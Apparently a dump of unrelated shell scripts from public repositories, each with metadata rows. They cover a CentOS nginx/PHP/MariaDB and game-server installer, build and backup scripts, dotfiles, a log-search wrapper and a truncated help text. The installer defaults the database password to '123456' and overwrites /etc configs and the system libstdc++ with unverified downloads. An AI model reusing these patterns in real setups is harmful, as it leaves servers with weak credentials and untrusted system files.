install=$(cat list.txt)
grep -q '[^[:space:]]' < list.txt
EMPTY_FILE=$?
if [[ $EMPTY_FILE -eq 1 ]]; then
echo "Nothing to do"
else
yum install -y $install
fi
}
packages="epel-release"
installNotExists $packages
packages="wget"
installNotExists $packages
packages="unzip"
installNotExists $packages
function nginx_php(){
tmpdir=$_TMPDIR/nginx-php
dpath=$_PATH/nginx-php
rootdir="/home/www"
packages="nginx"
installNotExists $packages
default="7"
read -p "Cai tren centos ($default or 8) : " _version
: ${_version:=$default}
function centos(){
wget -nc $dpath/index.php -P $tmpdir
}
function centos7(){
dpath=$_PATH/nginx-php/centos7
yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm -y
yum-config-manager --enable remi-php73 -y
yum --enablerepo=remi,remi-php73 install php-fpm php-common -y
yum --enablerepo=remi,remi-php73 install php-cli php-pdo php-mysqlnd php-gd php-mbstring php-mcrypt php-xml php-zip -y
wget -nc $dpath/php.ini -P $tmpdir
wget -nc $dpath/www.conf -P $tmpdir
wget -nc $dpath/your-domain.conf -P $tmpdir
wget -nc $dpath/nginx.conf -P $tmpdir
cp -r $tmpdir/php.ini /etc/php.ini
cp -r $tmpdir/www.conf /etc/php-fpm.d/www.conf
cp -r $tmpdir/your-domain.conf /etc/nginx/conf.d/your-domain.conf
cp -r $tmpdir/nginx.conf /etc/nginx/nginx.conf
}
function centos8(){
dpath=$_PATH/nginx-php/centos8
dnf install dnf-utils http://rpms.remirepo.net/enterprise/remi-release-8.rpm -y
dnf module reset php -y
dnf module enable php:remi-7.4 -y
dnf install php-fpm php-common -y
dnf install php-cli php-pdo php-mysqlnd php-gd php-mbstring php-mcrypt php-xml php-zip -y
wget -nc $dpath/www.conf -P $tmpdir
wget -nc $dpath/your-domain.conf -P $tmpdir
wget -nc $dpath/nginx.conf -P $tmpdir
cp -r $tmpdir/www.conf /etc/php-fpm.d/www.conf
cp -r $tmpdir/your-domain.conf /etc/nginx/conf.d/your-domain.conf
cp -r $tmpdir/nginx.conf /etc/nginx/nginx.conf
}
centos
centos$_version
# packages="php-fpm php-common php-cli php-pdo php-mysqlnd php-gd php-mbstring php-mcrypt php-xml php-zip"
# installNotExists $packages
systemctl start nginx
systemctl enable nginx
systemctl start php-fpm
systemctl enable php-fpm
mkdir -p $rootdir/your-domain
cp -r $tmpdir/index.php $rootdir/your-domain
chown nginx:nginx -R $rootdir/your-domain
chown -R nginx:nginx /var/lib/php/session/
chcon -Rt httpd_sys_content_t $rootdir/your-domain
chcon -Rt httpd_sys_rw_content_t $rootdir/your-domain
setsebool httpd_can_network_connect 1
}
#install mariadb
function mariadb(){
tmpdir=$_TMPDIR/mariadb
dpath=$_PATH/mariadb
packages="mariadb-server"
installNotExists $packages
wget -nc $dpath/my.cnf -P $tmpdir
cp -r $tmpdir/my.cnf /etc/my.cnf
systemctl start mariadb
systemctl enable mariadb
mysql_secure_installation
}
function vltkm(){
tmpdir=$_TMPDIR/vltkm
dpath=$_PATH/vltkm
rootdir="/home/vltkm"
pPackages=""
default=`wget -qO - icanhazip.com`
read -p "Ip may chu ($default): " vpsip
: ${vpsip:=$default}
default=123456
read -p "Mat khau database ($default): " dbpassword
: ${dbpassword:=$default}
default=127.0.0.1
read -p "Gateway Ip ($default): " gatewayip
: ${gatewayip:=$default}
default=11002
read -p "Gateway Port ($default): " gatewayport
: ${gatewayport:=$default}
function lib(){
wget -nc $dpath/libstdc++.so.6.zip -P $tmpdir
unzip -o $tmpdir/libstdc++.so.6.zip -d $rootdir
cp $rootdir/libstdc++.so.6.20 /lib64
rm -f /lib64/libstdc++.so.6
ln -s /lib64/libstdc++.so.6.20 /lib64/libstdc++.so.6
ldconfig
}
function gateway(){
wget -nc $dpath/Gateway.zip -P $tmpdir
unzip -o $tmpdir/Gateway.zip -d $rootdir/Gateway
sed -i "s/VPSIP/$vpsip/g" $rootdir/Gateway/gateway.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/gateway.ini
sed -i "s/GATEPORT/$gatewayport/g" $rootdir/Gateway/gateway.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/GoJxHttpSetting/go-jxhttp.json
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/GoJxHttpSetting/go-jxhttp_idip.json
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/RankServer.json
}
function webapi(){
default="/home/www/your-domain"
read -p "Thu muc chay web ($default) : " webdir
: ${webdir:=$default}
wget -nc https://octobercms.com/download -O octobercms.zip
wget -nc $dpath/web.zip -P $webdir
unzip -o octobercms.zip -d $webdir
rm -f octobercms.zip
mv $webdir/install-master/* $webdir
chown nginx:nginx -R $webdir
}
function serverPackages(){
default=$dpath/Package.zip
if [ "$pPackages" == "" ]
then
read -p "Duong dan download Package.zip(package.idx, package0.dat): " pPackages
: ${pPackages:=$default}
fi
wget -nc $dpath/ServerLibs.zip -P $tmpdir
wget -nc $dpath/Server.zip -P $tmpdir
wget -nc $pPackages -P $tmpdir
}
function zone(){
numsv=00
serverPackages
wget -nc $dpath/StartZone.zip -P $tmpdir
sdir="$rootdir/Zone"
unzip -o $tmpdir/ServerLibs.zip -d $sdir
unzip -o $tmpdir/Server.zip -d $sdir
unzip -o $tmpdir/Package.zip -d $sdir
unzip -o $tmpdir/StartZone.zip -d $sdir
sed -i "s/NUMSV/$numsv/g" $sdir/world_server.ini
sed -i "s/VPSIP/$vpsip/g" $sdir/world_server.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/world_server.ini
sed -i "s/GATEIP/$gatewayip/g" $sdir/world_server.ini
sed -i "s/GATEPORT/$gatewayport/g" $sdir/world_server.ini
sed -i "s/NUMSV/$numsv/g" $sdir/FileServer.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/FileServer.ini
mv $sdir/FileServer $sdir/ZoneFileServer
mv $sdir/Server $sdir/ZoneServer
}
function server(){
serverPackages
wget -nc $dpath/StartSV.zip -P $tmpdir
default=01
read -p "Nhap ten server (vd: $default): " numsv
: ${numsv:=$default}
sdir="$rootdir/Server_$numsv"
unzip -o $tmpdir/ServerLibs.zip -d $sdir
unzip -o $tmpdir/Server.zip -d $sdir
unzip -o $tmpdir/Package.zip -d $sdir
unzip -o $tmpdir/StartSV.zip -d $sdir
sed -i "s/NUMSV/$numsv/g" $sdir/world_server.ini
sed -i "s/VPSIP/$vpsip/g" $sdir/world_server.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/world_server.ini
sed -i "s/GATEIP/$gatewayip/g" $sdir/world_server.ini
sed -i "s/GATEPORT/$gatewayport/g" $sdir/world_server.ini
sed -i "s/NUMSV/$numsv/g" $sdir/FileServer.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/FileServer.ini
sed -i "s/NUMSV/$numsv/g" $sdir/start.sh
sed -i "s/NUMSV/$numsv/g" $sdir/world_server.sh
sed -i "s/NUMSV/$numsv/g" $sdir/stop.sh
mv $sdir/FileServer $sdir/FileServer_$numsv
mv $sdir/Server $sdir/Server_$numsv
}
default="lib gateway zone server webapi"
read -p 'Enter packages (lib, gateway, zone, server, webapi): ' packages
: ${packages:=$default}
for package in $packages; do $package; done
chmod -R 755 $rootdir
}
default="nginx_php mariadb vltkm"
packages=$@
: ${packages:=$default}
for package in $packages; do $package; done
| true
|
d00a77801116c7d12f0b8584592573efc3862889
|
Shell
|
bpmurray/Exactitude
|
/Exactitude-tools/phase-3-compile.sh
|
UTF-8
| 3,598
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/sh
##############################################################################
# This is the third phase - compile the files
. ../Exactitude-tools/phase-0-settings.sh
##############################################################################
# Start the process
echo "Phase 3: Configure and compile"
###############################################################################
# Build the files
# JPEG
echo -n "Building JPEG ..."
echo "===================== JPEG-${JPEGSRC_VERSION} ======================" >${BUILDLOG}
cd ${SRCDIR}/jpeg-${JPEGSRC_VERSION}
echo -n " configure ..."
./configure CFLAGS='-O2' ${CONFIGFLAGS} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
make test >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# ffmpeg
echo -n "Building FFMPEG ..."
echo "===================== ffmpeg-${FFMPEG_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/ffmpeg-${FFMPEG_VERSION}
echo -n " configure ..."
./configure --prefix=${PREFIX} --enable-shared --enable-swscale --enable-pthreads ${CONFIGFLAGSA} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# libsndfile
echo -n "Building libsndfile ..."
echo "===================== libsndfile-${LIBSNDFILE_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/libsndfile-${LIBSNDFILE_VERSION}
## We may need these (note: they require a load of extra stuff!)
# sudo apt-get install libflac* libogg* libvorbis*
echo -n " configure ..."
./configure ${CONFIGFLAGS} --prefix=${PREFIX} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# libsamplerate
echo -n "Building libsamplerate ..."
echo "===================== libsamplerate-${LIBSAMPLERATE_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/libsamplerate-${LIBSAMPLERATE_VERSION}
echo -n " configure ..."
./configure ${CONFIGFLAGS} --prefix=${PREFIX} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# mpg123
echo -n "Building mpg123 ..."
echo "===================== mpg123-${MPG123_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/mpg123-${MPG123_VERSION}
echo -n " configure ..."
./configure ${CONFIGFLAGS} --prefix=${PREFIX} --exec-prefix=${PREFIX} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# pHash
echo -n "Building pHash ..."
echo "===================== phash-${PHASH_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/pHash-${PHASH_VERSION}
${COPY} ../CImg-${CIMG_VERSION}/CImg.h ${INCDIR}
${COPY} ../CImg-${CIMG_VERSION}/CImg.h .
echo -n " configure ..."
echo ./configure --enable-java --enable-video-hash ${CONFIGFLAGS} LDFLAGS=${LDFLAGS} CFLAGS=${CFLAGS} >>${BUILDLOG} 2>&1
./configure --enable-java --enable-video-hash ${CONFIGFLAGS} LDFLAGS=${LDFLAGS} CFLAGS="${CFLAGS}" >>${BUILDLOG} 2>&1
echo -n " build ..."
make clean
make >>${BUILDLOG} 2>&1
cd bindings/java
# Copy the updated file(s)
${COPYALL} ${STARTDIR}/../Exactitude-pHash/pHash-updates/* .
rm -rf ./org/.svn ./org/phash/.svn
mkdir -p bin
javac -d bin org/phash/*.java >>${BUILDLOG} 2>&1
cd bin
jar -cf ${LIBDIR}/pHash-${PHASH_VERSION}.jar *
cd ${SRCDIR}/pHash-${PHASH_VERSION}
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
###############################################################################
echo "Phase 3 (compile) complete"
| true
|
e6399ef29449d1a438026973fb953be725341d59
|
Shell
|
boakes/BST
|
/git.sh
|
UTF-8
| 265
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/sh
cd "$(dirname "$0")"
now=$(date +"%D %T")
cp ~/Desktop/DataAbstraction/BST\ Map/BSTMap.cpp ~/Desktop/DataAbRepo/BST/
cp ~/Desktop/DataAbstraction/BST\ Map/BSTMap.h ~/Desktop/DataAbRepo/BST/
echo "Finished copy!"
git add .
git commit -m "$now"
git push
| true
|
96c33c32ce80b99eb6bd7819ed57d59df1099bff
|
Shell
|
baio/ride-better-ionic-app
|
/res/gen-screen.sh
|
UTF-8
| 1,834
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
# Generate PhoneGap icon and splash screens.
# Copyright 2013 Tom Vincent <http://tlvince.com/contact>
usage() { echo "usage: $0 icon colour [dest_dir]"; exit 1; }
[ "$1" ] && [ "$2" ] || usage
[ "$3" ] || set "$1" "$2" "."
devices=android,bada,bada-wac,blackberry,ios,webos,windows-phone
eval mkdir -p "$3/{icon,screen}"
# Show the user some progress by outputing all commands being run.
set -x
# Explicitly set background in case image is transparent (see: #3)
convert="convert $1 -background $2 -gravity center"
$convert -resize 192x320 "$3/screen/192x320.png"
$convert -resize 200x320 "$3/screen/200x320.png"
$convert -resize 225x225 "$3/screen/225x225.png"
$convert -resize 240x400 "$3/screen/240x400.png"
$convert -resize 288x480 "$3/screen/288x400.png"
$convert -resize 320x200 "$3/screen/320x200.png"
$convert -resize 320x480 "$3/screen/320x480.png"
$convert -resize 480x320 "$3/screen/480x320.png"
$convert -resize 480x800 "$3/screen/480x800.png"
$convert -resize 480x800 "$3/screen/480x800.jpg"
$convert -resize 640x1136 "$3/screen/640x1136.png"
$convert -resize 649x960 "$3/screen/649x960.png"
$convert -resize 640x960 "$3/screen/640x960.png"
$convert -resize 720x1200 "$3/screen/720x1200.png"
$convert -resize 720x1280 "$3/screen/720x1280.png"
$convert -resize 768x1004 "$3/screen/768x1004.png"
$convert -resize 768x1024 "$3/screen/768x1024.png"
$convert -resize 800x480 "$3/screen/800x480.png"
$convert -resize 960x640 "$3/screen/960x640.png"
$convert -resize 1280x720 "$3/screen/1280x720.png"
$convert -resize 1024x768 "$3/screen/1024x768.png"
$convert -resize 1024x783 "$3/screen/1024x783.png"
$convert -resize 1536x2008 "$3/screen/1536x2008.png"
$convert -resize 1536x2048 "$3/screen/1536x2048.png"
$convert -resize 2008x1536 "$3/screen/2008x1536.png"
$convert -resize 2048x1536 "$3/screen/2048x1536.png"
| true
|
13f14b1ecf1287be80293e217daa760b8e1b9e63
|
Shell
|
franckh/env_projects
|
/.bash_profile
|
UTF-8
| 538
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
echo 'load ~/dev/home/.bash_profile'
source ~/.bash/aliases.bash
#source ~/.bash/functions
source ~/.bash/completions.bash
#source ~/.bash/paths
#source ~/.bash/config
#source ~/.bash/history_config
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# Enable RVM
#[[ -s $HOME/.rvm/scripts/rvm ]] && source $HOME/.rvm/scripts/rvm
# prompt
if [ `declare -F __git_ps1` ]; then
# git available
export PS1='\[\033]0;$MSYSTEM:\w\007\033[32m\]\[\033[1;36m\w$(__git_ps1)\033[0m\] \n$ '
else
export PS1="\e[1;36m[\!]\w# \e[m"
fi
| true
|
f1aa8f7cb977618f9305d398fa19983de48fce22
|
Shell
|
pvinis/Karabiner
|
/files/extra/startup.sh
|
UTF-8
| 668
| 3.265625
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin; export PATH
basedir='/Library/Application Support/org.pqrs/Karabiner'
# --------------------
argument="$1"
[ -z "$argument" ] && argument=start
case "$argument" in
start)
if [ -f /etc/karabiner_kextload_delay ]; then
delay=`ruby -e 'print $stdin.read.to_i' < /etc/karabiner_kextload_delay`
sleep $delay
fi
echo "Starting Karabiner"
kextload "$basedir/Karabiner.signed.kext"
;;
stop)
echo "Stopping Karabiner"
kextunload -b org.pqrs.driver.Karabiner
;;
*)
echo "Usage: $0 {start|stop}"
;;
esac
exit 0
| true
|
b4f1d9736eea0ce8ab1c965f0058532d2587a41c
|
Shell
|
marwahaha/multiverse-development
|
/portal-gun/portals/controller.portals/network.controller.portals/debian9.network.portal/portals/universe.router.portal/packages.sh
|
UTF-8
| 573
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
# Multiverse OS Script Color Palette
header="\e[0;95m"
accent="\e[37m"
subheader="\e[98m"
strong="\e[96m"
text="\e[94m"
success="\e[92m"
reset="\e[0m"
echo -e $header"Multiverse OS: Universe Router Package Installer"$reset
echo -e $accent"==============================================="$reset
echo -e $subpackage"# Packages"$reset
echo -e $text"apk updating..."$reset
apk update
echo -e $text"apk installing dhcp..."$reset
apk add dhcp
echo -e $text"apk installing shorewall..."$reset
apk add shorewall
echo -e $success"Package installation completed."$reset
| true
|
114c856e5b9bbd998e46f16c09329ff9eb639000
|
Shell
|
Stolz/laravel
|
/bin/stats
|
UTF-8
| 420
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# get stats about the code
source "$( cd "$( dirname "$0" )" && pwd )/common" || exit 1
go_to_laravel_dir
command -v cloc >/dev/null 2>&1 || exit_error "'cloc' program not found. Install it from https://github.com/AlDanial/cloc"
DIRS='app bin config database resources routes tests'
echo
color "Code stats (lines)" purple
cloc $DIRS
echo
color "Code stats (percentage)" purple
cloc $DIRS --by-percent c
| true
|
05677d59240b90cd0b7e2377358a987274121b45
|
Shell
|
werstatyw/siebel15
|
/STAGING-ROLES/searchPatternMultiMonForAA/srchPtrn.ksh
|
UTF-8
| 8,208
| 3.796875
| 4
|
[] |
no_license
|
#!/usr/bin/ksh
# srchPtrn.ksh
# Created by Rashid Khan, TSO
# Version: 4.0
# Date Created: 24-Nov-2016
# Date Updated: 28-Jun-2017
# Date Updated: 21-Sep-2017
# Date Updated: 13-Dec-2017 - Added Lock file
# Date Updated: 19-Jan-2018 - Modified to handle multiple monitors concurrently
#
# Turn on the debug and write into logging Utils\debug folder with timestamp in file name
# This script is calling a python script to do an case insensitive search in given file(s).
# 1. Search Pattern string or strings with pipe ('%') in between
# please enclose the whole parameter with double qoute for search string pattern
# 2. File patterns to be searched or file patern strings with pipe ('|') in between
# please enclose the whole parameter with double qoute for search string pattern.
#
# script will return number of occurences for SUCCESS and 0 for FAILURE.
# Script creates outputs in the same log directory where search has to be done .
#
# some example command line for the script:
#
#set -x
##================v4-moved below variables to init_srchPtrn.ksh
#SCRIPT_NAME=srchPtrn.py
#DEBUG_DIR='/opt/tso/tomcat/aaAgent.conf/Utils/debug'
#OUTPUT_FILE="${DEBUG_DIR}/srchPtrn-output.log.`date +%Y%m%d-%H%M%S`"
#TMP_FILE="${DEBUG_DIR}/srchPtrn-output1.log"
#BASS_DIR="/opt/tso/tomcat/aaAgent.conf/Utils"
#typeset -r LOCKFILE="${BASS_DIR}/srchPtrn.lock"
#typeset -ir LOCKWAITTIME=2 # seconds
. ./init_srchPtrn.ksh #v4 - source all global variables
# Remove the lock and temporary file if the script is interrupted before it ends normally.
trap 'rm -f $LOCKFILE ${BASS_DIR}/srchPtrn.confg_new' 2 3 9 15 255 # 0=normal exit - v4
##check operating system for AIX, to set python path
if [ `uname` == 'AIX' ]
then
export PYTHON_BIN='/opt/opsware/agent/bin/python'
export PATH=$PATH:$PYTHON_BIN
fi
##start-v4 changes
#if [ $# -lt 2 ]
if [ $# -lt 3 ]; then
echo "Usage: $0 <Unique Monitor ID> <FILE_PATTERN with full path> <Search strings> " > ${OUTPUT_FILE}
echo "where: Unique Monitor ID required to identify last read positions for files in srchPtrn.confg" >> ${OUTPUT_FILE}
echo " File_PATTERN could be multiple files with full path using wild card '*' or separated by %" >> ${OUTPUT_FILE}
echo " Search strings could be multiple Search strings separated by % >" >> ${OUTPUT_FILE}
#echo "Usage: $0 <FILE_PATTERN with full path> <PRIMARY Search strings> [SECONDARY Search strings ] " > ${OUTPUT_FILE}
#exit 0
return 1
else
MONITOR_ID=$1
OUTPUT_FILE="${DEBUG_DIR}/srchPtrn-output-${MONITOR_ID}.log.`date +%Y%m%d-%H%M%S`"
export MONITOR_ID OUTPUT_FILE
fi
if [ -f ${BASS_DIR}/srchPtrn.confg ]; then
# if file srchPtrn.confg exists then
# - Read the last position configuration file srchPtrn.confg for its own process ID and create a temporary srchPtrn.confg_processID
egrep "^${MONITOR_ID}" ${BASS_DIR}/srchPtrn.confg > /dev/null
if [ $? -eq 0 ]; then
if [ $DEBUG_MSG -gt 0 ]; then
echo "found records in ${BASS_DIR}/srchPtrn.confg" ## testing
fi
egrep "^${MONITOR_ID}" ${BASS_DIR}/srchPtrn.confg > $BASS_DIR/srchPtrn.confg_$MONITOR_ID
else
if [ $DEBUG_MSG -gt 0 ]; then
echo "NOT found records in ${BASS_DIR}/srchPtrn.confg" ## testing
fi
touch ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
fi
else
# else if file srchPtrn.confg DOES NOT exist then
# - create srchPtrn.confg
if [ $DEBUG_MSG -gt 0 ]; then
echo "file ${BASS_DIR}/srchPtrn.conf Not found . create new one.."
fi
touch ${BASS_DIR}/srchPtrn.confg
touch ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
fi
#temporary file to keep monitor related last file read positions info
TMP_CONFIG_FILE=${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
if [ $DEBUG_MSG -gt 0 ]; then
echo "SCRIPT_NAME=$SCRIPT_NAME"
echo "BASS_DIR=$BASS_DIR"
echo "DEBUG_DIR=$DEBUG_DIR"
echo "OUTPUT_FILE=$OUTPUT_FILE"
#echo "TMP_FILE=$TMP_FILE" #v4 commented
echo "MONITOR_ID=$MONITOR_ID"
echo "TMP_CONFIG_FILE=$TMP_CONFIG_FILE"
fi
SCRIPT_NAME_WPATH=`dirname $0`/$SCRIPT_NAME
#FILE_PATRN=$1 #v4-commented
FILE_PATRN=$2 #v4-added
#PRIMARY_SRCH_PTRN=$2 #v4-commented
PRIMARY_SRCH_PTRN=$3 #v4-added
cat /dev/null > ${OUTPUT_FILE}
echo "Run Date/Time: "`date` >> ${OUTPUT_FILE}
#
echo "\nFILE_PATRN: $FILE_PATRN\n" >> ${OUTPUT_FILE}
echo "\nPRIMARY_SRCH_PTRN: $PRIMARY_SRCH_PTRN\n" >> ${OUTPUT_FILE}
ret_val=0
echo "\nCommnad: $0 $*" >> ${OUTPUT_FILE}
python "${SCRIPT_NAME_WPATH}" "${FILE_PATRN}" "${PRIMARY_SRCH_PTRN}" >> ${OUTPUT_FILE} ##v4
ret_val=$?
if [ $DEBUG_MSG -gt 0 ]; then
echo "\nret_val=$ret_val \n" ##testing
fi
##start testing
if [ $DEBUG_MSG -gt 0 ]; then
echo "temp monitor cfg: ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}"
cat ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
fi
###v4 changes
## update srchPtrn.config master file for the Monitor ID
#- get lock on srchPtrn.confg for writing
# If lockfile exists, wait for it to go away.
if [ -f $LOCKFILE ]; then
print "Waiting...\c"
icounter=0
while [ -f $LOCKFILE ] && [ $icounter -lt 15 ]
do
sleep $LOCKWAITTIME
((icounter=$icounter+1))
print "waiting for icounter $icounter"
if [ $icounter -gt 14 ]; then
echo "File $BASS_DIR/srchPtrn.confg locked ... retried 5 times. No luck, goodbye " >> ${OUTPUT_FILE}
echo "Search results for the Monitor ID '$MONITOR_ID' is in $BASS_DIR/srchPtrn.confg_$MONITOR_ID but FAILED to update $BASS_DIR/srchPtrn.config master file" >> ${OUTPUT_FILE}
#exit 1
return 1
fi
done
fi
# LOCKFILE does not exist so create it.
if [ $DEBUG_MSG -gt 0 ]; then
print "$BASS_DIR/srchPtrn.confg locked by $MONITOR_ID"
fi
print "$BASS_DIR/srchPtrn.confg locked by $MONITOR_ID" > $LOCKFILE
chmod 444 $LOCKFILE
#- create backup of srchPtrn.confg i.e. srchPtrn.confg_bak
cp -p $BASS_DIR/srchPtrn.confg $BASS_DIR/srchPtrn.confg_bak
#- Read the last position configuration file srchPtrn.confg for its own process ID and create an output file srchPtrn.confg_new without own process ID records
egrep -v "^${MONITOR_ID}" ${BASS_DIR}/srchPtrn.confg > ${BASS_DIR}/srchPtrn.confg_new
if [ $? -eq 0 ]; then
#- overwrite srchPtrn.confg with srchPtrn.confg_new, to make it without processID rows
cp ${BASS_DIR}/srchPtrn.confg_new ${BASS_DIR}/srchPtrn.confg
fi
#- append srchPtrn.confg_processID into srchPtrn.confg i.e. srchPtrn.confg_processID > srchPtrn.confg
cat ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID} >> ${BASS_DIR}/srchPtrn.confg
if [ $? -eq 0 ]; then
#- delete srchPtrn.confg_processID & srchPtrn.confg_new
rm -f ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID} ${BASS_DIR}/srchPtrn.confg_new
else
echo "Error: Unable to append new file positions into $BASS_DIR/srchPtrn.confg for completed search processing. please check files $BASS_DIR/srchPtrn.confg_$MONITOR_ID and $BASS_DIR/srchPtrn.confg_new"
return 1
fi
#- unlock srchPtrn.confg for writing
#rm -f $LOCKFILE
###end -v4 changes
#check ret_val returned from Python process
if [[ ${ret_val} -gt 0 ]]; then
head -36 ${OUTPUT_FILE}
echo "\n========================================================================="
echo "\n***** for full summary report, please check log file ${OUTPUT_FILE} ********"
echo "\n========================================================================="
if [[ ${ret_val} -lt 255 ]]; then
#rm -f ${LOCKFILE} ##v4 -commented
[ -f ${LOCKFILE} ]; rm -f ${LOCKFILE} #v4
exit ${ret_val}
else
#rm -f ${LOCKFILE} ##v4 -commented
[ -f ${LOCKFILE} ]; rm -f ${LOCKFILE} #v4
exit 255
fi
else
echo "\n========================================================================="
echo "\n***** for full summary report, please check log file ${OUTPUT_FILE} ********"
echo "\n========================================================================="
#[ -f ${strRunLog} ]; rm -f ${strRunLog} ##v4 -commented
[ -f ${LOCKFILE} ]; rm -f ${LOCKFILE}
exit ${ret_val}
fi
#[ -f ${strRunLog} ]; rm -f ${strRunLog} ##v4 -commented
[ -f ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID} ]; rm -f ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
| true
|
d86910e83e146712e37f9928f0aa0da800be695f
|
Shell
|
poxstone/BASH_REPO
|
/cloudshell/i.sh
|
UTF-8
| 1,172
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
userDir=$HOME;
localDir="/usr/local/nvm";
#localDir="$HOME/.nvm";
# define version node
if [ $1 ];then nodeV=$1; else nodeV="8"; fi;
# load profile and eviroment vars profile for use in this bash
. $localDir/nvm.sh; . $userDir/.profile;
# Change node version
nvm use $nodeV >> /dev/null; #does not print in screen
# Install node
if [[ $(node -v 2>&1) != *"v$nodeV"* ]];then
echo "----------install node $nodeV------------";
sudo su <<EOF
whoami
. $localDir/nvm.sh; . $userDir/.profile;
nvm install $nodeV;
nvm use $nodeV >> /dev/null;
EOF
fi;
# Install tools
if [[ $(stylus --version 2>&1) == *"command not found"* ]];then
echo "----------install node tools for $nodeV------------";
sudo su <<EOF
whoami;
. $localDir/nvm.sh; . $userDir/.profile;
# use v node as normal user cation
nvm use $nodeV >> /dev/null;
npm install -g stylus nib bower @angular/cli;
EOF
fi;
# Install tools
if [[ ! $(whereis nmap) ]];then
echo "----------install nmap------------";
sudo su <<EOF
whoami;
apt-get install nmap -y;
echo "tools installed";
EOF
fi;
| true
|
66666e8357b5659db5a12954c87aca585d815ded
|
Shell
|
caileighf/ACBOX
|
/scripts/debug/echo_help.sh
|
UTF-8
| 10,524
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Prints help messages for ACBOX
PRINT_HEADER=true
HEADER=$(cat <<-END
------------------------------------------------------
| \033[1mHelp Message for the Acoustic Data Acquisition Box\033[0m |
------------------------------------------------------
END
)
DEBUG_HELP=$(cat <<-END
\033[1mDEBUGGING INFO AND HELPFUL SHORTCUTS\033[0m
------------------------------------
Remote Debugging Help/Tools:
Useful aliases: (type directly from the prompt)
$ has_fix # find out if GPS has fix
$ has_pps # find out if PPS is being used
$ get_loc # echo lat, lon and, google maps link
$ see_daq # checks if DAQ is connected
$ daq_state # checks if DAQ is Running or Idle
$ help # show complete help message | less
$ help_cli # show cli-spectrogram help message | less
$ help_daq # show MCC_DAQ driver help message | less
$ help_debug # show THIS help message | less
$ help_offload # show data offload help message | less
$ get_volume # get volume on RPi headphone jack
$ get_cpu_temp # get cpu temp in celsius
$ get_free_mem # get remaining disk space
GNU screen status bar section info
1. [$USER@$HOST | DAQ state: Idle]
| | |
| | -- User selectable (see next table)
| --------------- Host machine
--------------------- Current user
2. no fix state: [ GPS HAS NO FIX ]
gpsd error: [ No GPS data ]
fix state:
[ 41.525098,-70.672022 - https://maps.google.com/maps?q=41.525098,+-70.672022 ]
| | |
| | --- URL to google maps location
| ------------------- Longitude (Decimal Degrees)
------------------------------- Latitude (Decimal Degrees)
3. [system time: 10/11/20 14:50:17] -- Current system date/time
Change screen session status bar:
* C-a --> Ctrl + a
C-a t -- show cpu temp ----------------------- [$USER@$HOSTNAME | cpu temp: 49.4'C]
C-a l -- show system load -------------------- [$USER@$HOSTNAME | cpu load: 0.02 0.14 0.10]
C-a s -- show volume on RPi headphone jack --- [$USER@$HOSTNAME | volume: -20.00dB]
C-a m -- show available disk space ----------- [$USER@$HOSTNAME | free space: 53G]
C-a u -- show machine up time ---------------- [$USER@$HOSTNAME | up since: 2020-09-29 15:58:51]
C-a D -- show DAQ state (Default at launch) -- [$USER@$HOSTNAME | DAQ state: Idle]
Other helpful screen keyboard shortcuts:
C-a ? --- Show screen keyboard shortcuts
C-a ESC - Scroll mode (hit ESC again to exit)
C-a w --- Show all windows
C-a F2 -- Puts Screen into resize mode.
Resize regions using hjkl keys
C-a f --- Hide both status bars
C-a F --- Show both status bars
END
)
CLI_HELP=$(cat <<-END
\033[1mUSING THE CLI-SPECTROGRAM\033[0m
-------------------------
Start Command Line Spectrogram:
$ cli_spectrogram [OPTIONS] # alias to launch cli_spectrogram.py
$ cli_spectrogram_auto # starts cli-spectrogram with DAQ config file
Useful shortcuts:
"f" -----> Toggle fullscreen
"c" -----> Cycle through channels
"B" -----> Go to beginning of data set
"A" -----> Go back 10 mins
